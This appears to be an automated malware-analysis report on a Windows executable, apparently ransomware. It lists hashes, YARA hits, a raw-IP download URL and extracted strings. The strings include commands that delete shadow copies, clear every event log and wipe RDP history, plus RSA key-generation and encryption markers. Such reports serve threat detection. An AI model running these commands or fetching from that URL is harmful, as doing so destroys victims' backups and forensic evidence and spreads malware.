Sample details: 638b113d635506f70701f4029234d902

Hashes
MD5: 638b113d635506f70701f4029234d902
SHA1: 0612b1cbf8d2da09b035c915e6d6b6361a77d8b5
SHA256: 7061c90ea67558b014575f40bc69ff513ee553e127f190bb0a429e5b5710b378
SSDEEP: 1536:iQ7HUMNRSNXlgQHsxPDZEo5wTsl1axVZXx:iQzUORSNXlexJ5yxVFx
Details
File Type: PE32
Yara Hits
YRP/IsPE32 | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/HasRichSignature | YRP/domain | YRP/contentis_base64 | YRP/System_Tools | YRP/Dropper_Strings | YRP/win_registry | YRP/win_files_operation | YRP/Prime_Constants_long
Source
http://216.170.126.99/1.exe
Strings
		!This program cannot be run in DOS mode.
'2_ocS1<cS1<cS1<
\l<aS1<j+
<nS1<cS0<'S1<n
<vS1<n
<bS1<RichcS1<
.rdata
c;: Nqcq
`_#:x?
?Ao b,A
~37@DP
taskkill /F /T /PID 
0123456789ABCDEF
SHA224
SHA256
SHA-256
sha224WithRSAEncryption
RSA with SHA-224
sha256WithRSAEncryption
RSA with SHA-256
RSASSA-PSS
rsaEncryption
id-ecPublicKey
Generic EC key
id-ecDH
EC key for ECDH
desCBC
DES-CBC
des-ede3-cbc
DES-EDE3-CBC
id-sha224
SHA-224
id-sha256
010001
{%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
outlook
postgre
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp 
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
{{IDENTIFIER}}
rsa_encrypt
rsa_genkey
UVWjD^V3
D$,PUUh
A		D$(
D$(3T>
Ht]Ht5Ht
L$0+L$4
s2j Y+
t2j Y+
y;9|$Xt
D$pCSP
9D$$u6j
uESUPU
L$ _^][
C9\$TvV
C;\$Tr
D$@PPj
4SUVWj03
\$4UW;X
;D$Pu{US
|$09G4
F9\$0u
D$4YYV
Ht_HuR
SVWjpj
$SVWPh
^]_[YY
UWhl&@
WPhhl@
D$LUWP
D$XVSP
t$ VWU
HeapCreate
HeapAlloc
CloseHandle
lstrcpyA
lstrcatA
lstrlenW
CreateProcessA
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
HeapReAlloc
HeapFree
GetProcessHeap
lstrlenA
GetLastError
GetFileSizeEx
WriteFile
ReadFile
SetFilePointerEx
CreateFileW
GetCurrentProcess
ExitProcess
GetCurrentThread
SetThreadPriority
GetLogicalDrives
GetStdHandle
SetFilePointer
FindClose
lstrcmpiA
lstrcmpiW
lstrcpynA
lstrcpyW
lstrcatW
GetModuleFileNameW
CreateProcessW
GetEnvironmentVariableW
GetDriveTypeA
GetTempFileNameW
SetFileAttributesW
GetFileAttributesW
FindFirstFileW
FindNextFileW
CopyFileW
MoveFileExW
SetPriorityClass
MultiByteToWideChar
WideCharToMultiByte
CompareStringA
KERNEL32.dll
wsprintfA
USER32.dll
CryptAcquireContextW
CryptReleaseContext
CryptGenRandom
GetCurrentHwProfileW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
ADVAPI32.dll
ShellExecuteExW
SHChangeNotify
SHELL32.dll
StrStrA
PathFindFileNameW
PathRemoveFileSpecW
SHLWAPI.dll
_aulldiv
_alldiv
_allrem
ntdll.dll
UuidCreate
RPCRT4.dll
S-R.o[
wp`/kd
.j,W]p
02iae|{
wpCq	p
[#]ZOY
ZDm4Ni
tln	r.JLTXX
#r+2>-